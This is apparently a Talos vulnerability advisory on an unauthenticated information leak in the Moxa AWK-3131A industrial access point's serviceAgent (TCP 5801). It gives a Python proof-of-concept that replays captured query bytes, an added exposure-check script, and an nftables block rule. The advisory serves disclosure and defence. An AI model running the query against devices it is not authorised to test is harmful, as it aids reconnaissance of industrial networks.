Talos Intelligence - TALOS-2016-0238
Published Apr 10, 2017
www.talosintelligence.com

Moxa AWK-3131A serviceAgent Information Disclosure Vulnerability
CVSS2: 5 - AV:N/AC:L/Au:N/C:P/I:N/A:N
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: NONE
  Availability Impact: NONE

CVSS3: 5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: LOW
  Integrity Impact: NONE
  Availability Impact: NONE

EPSS: 0.001 (percentile 47.7%)

Summary

An exploitable information disclosure vulnerability exists in the serviceAgent functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted TCP query will allow an attacker to retrieve potentially sensitive information.

Tested Versions

Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1

Product URLs

http://www.moxa.com/product/AWK-3131A.htm

CVSSv3 Score

5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Details

An exploitable information disclosure vulnerability exists in the serviceAgent functionality of the Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted TCP query will allow an attacker to retrieve potentially sensitive information, such as the firmware version.

The functionality exposed by serviceAgent is reachable with the freely available Moxa Windows Search Utility or with custom scripts that replay its traffic. The service requires no authentication and the protocol is cleartext, so anyone who can reach TCP port 5801 on the device can issue the query and read the answer.

Exploit Proof-of-Concept

The Python script below, using a payload pulled from traffic generated by the Moxa Windows Search Utility, retrieves information from a target device that may be of value to an attacker.

#!/usr/bin/env python3

import socket

host = '<device IP>'   # target AWK-3131A
port = 5801            # serviceAgent listener

# Request captured from the Moxa Windows Search Utility; replayed unchanged.
query = (
    b"\x00\x01\x00\x01\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x0c\x29\xd3\xe0\x26\x00\x90\xe8\x57\x23\x07"
    b"\x00\x00\x00\x05\x00\x02\x00\x06\x00\x18\x00\x00\x00\x00"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((host, port))
s.sendall(query)   # sendall() so the whole 46-byte query goes out

# No authentication and no handshake: the device answers the cleartext query directly.
print(s.recv(1024))

s.close()
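For defenders, the same query doubles as an exposure check: run it from outside the OT segment and any host that answers has its serviceAgent reachable across the boundary. The script below is an added example, not the Talos proof-of-concept or Moxa's code. It reuses the captured request bytes from the advisory unchanged and adds only a connect/read timeout, error handling and a hexdump of the raw reply; the reply format is not documented on this page, so nothing is parsed. The local "fake agent" and its reply bytes are constructed stand-ins so the script runs offline; the port number is the one from the proof-of-concept.

```python
#!/usr/bin/env python3
"""Exposure check for the Moxa AWK-3131A serviceAgent (TCP/5801).

Added example, not the Talos proof-of-concept. The request bytes are the
ones captured from the Moxa Windows Search Utility; the local fake agent
and CONSTRUCTED_REPLY are made up so the script and its test run offline.
"""
import socket
import threading

SERVICEAGENT_PORT = 5801

# Request captured from the Moxa Windows Search Utility, exactly as the advisory lists it.
SERVICEAGENT_QUERY = bytes.fromhex(
    "000100010000000a0000000000000000"
    "00000000000c29d3e0260090e8572307"
    "0000000500020006001800000000"
)

# Constructed stand-in reply (assumption: not the real serviceAgent response format).
CONSTRUCTED_REPLY = b"\x00\x02\x00\x01AWK-3131A\x001.1\x00"


def probe(host, port=SERVICEAGENT_PORT, timeout=3.0):
    """Send the captured query and return whatever the peer sends back.

    Returns None when the port is closed, filtered or silent, which is the
    state a boundary firewall rule for TCP/5801 should produce.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(SERVICEAGENT_QUERY)      # whole 46-byte query in one call
            chunks = []
            while True:
                try:
                    data = s.recv(4096)
                except socket.timeout:         # peer kept the socket open but went quiet
                    break
                if not data:                   # peer closed: reply is complete
                    break
                chunks.append(data)
    except OSError:                            # refused, unreachable, connect timeout
        return None
    return b"".join(chunks) or None


def check_host(host, port=SERVICEAGENT_PORT, timeout=3.0):
    """Return (exposed, reply) so callers can assert on or log the result."""
    reply = probe(host, port, timeout)
    return reply is not None, reply


def hexdump(data, width=16):
    """Offset / hex / ASCII dump; the reply format is undocumented, so raw
    bytes are shown rather than parsed."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:04x}  {hexpart:<{width * 3}} {text}")
    return "\n".join(lines)


def start_fake_agent(reply=CONSTRUCTED_REPLY):
    """Constructed stand-in for a device: answer one connection that sends the
    captured query, then close. Returns the ephemeral port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with srv, conn:
            conn.settimeout(3.0)
            if conn.recv(1024) == SERVICEAGENT_QUERY:   # no auth: the query alone suffices
                conn.sendall(reply)

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                      # real target: host [port]
        target = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else SERVICEAGENT_PORT
    else:                                      # no target given: demo against the stand-in
        target, port = "127.0.0.1", start_fake_agent()
    exposed, reply = check_host(target, port)
    print(f"{target}:{port} serviceAgent {'REACHABLE' if exposed else 'not reachable'}")
    if reply:
        print(hexdump(reply))
```

Run it as `python3 check.py <device IP>` from the far side of a network boundary; a `REACHABLE` verdict means the boundary is not blocking TCP/5801. Run with no arguments it exercises the constructed stand-in only.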

Mitigation

It does not appear possible to disable serviceAgent using legitimately accessible functionality. In addition, the service does not require authentication and transmits information in cleartext. Blocking this service from communicating across network boundaries will mitigate some of the risk associated with this vulnerability.
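Because the service cannot be disabled on the device, the block has to be enforced off-box. The ruleset below is an added example, not part of the Talos advisory or any Moxa documentation: an nftables forward-chain policy for the router or firewall between the OT segment holding the access points and the rest of the network. The interface name `ot0`, the subnets and the address of the single engineering workstation allowed to use the Moxa Search Utility are assumptions; the port is the one from the proof-of-concept.

```nft
# Added example: nftables ruleset for a router/firewall that sits between the
# OT segment holding the AWK-3131A units (assumed 10.10.0.0/24 on "ot0") and
# the rest of the network. Interface names and addresses are assumptions.
table inet moxa_serviceagent {
    chain forward {
        type filter hook forward priority 0; policy accept;

        # One designated engineering workstation (assumed 10.20.0.5) may still
        # reach the APs' serviceAgent for legitimate use of the Search Utility.
        ip saddr 10.20.0.5 ip daddr 10.10.0.0/24 tcp dport 5801 accept

        # Everything else crossing the boundary towards TCP/5801 is logged and
        # dropped; the query needs no authentication, so reachability is the risk.
        ip daddr 10.10.0.0/24 tcp dport 5801 log prefix "moxa-serviceagent " drop

        # Also stop hosts on the OT segment from querying serviceAgents elsewhere.
        iifname "ot0" tcp dport 5801 log prefix "moxa-serviceagent " drop
    }
}
```

Load it with `nft -f moxa_serviceagent.nft` and confirm with `nft list table inet moxa_serviceagent`; the log prefix makes blocked probes easy to pick out of the kernel log, which is useful as a detection signal for anyone scanning for these devices.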

Timeline

2016-11-18 - Vendor Disclosure
2017-04-10 - Public Release
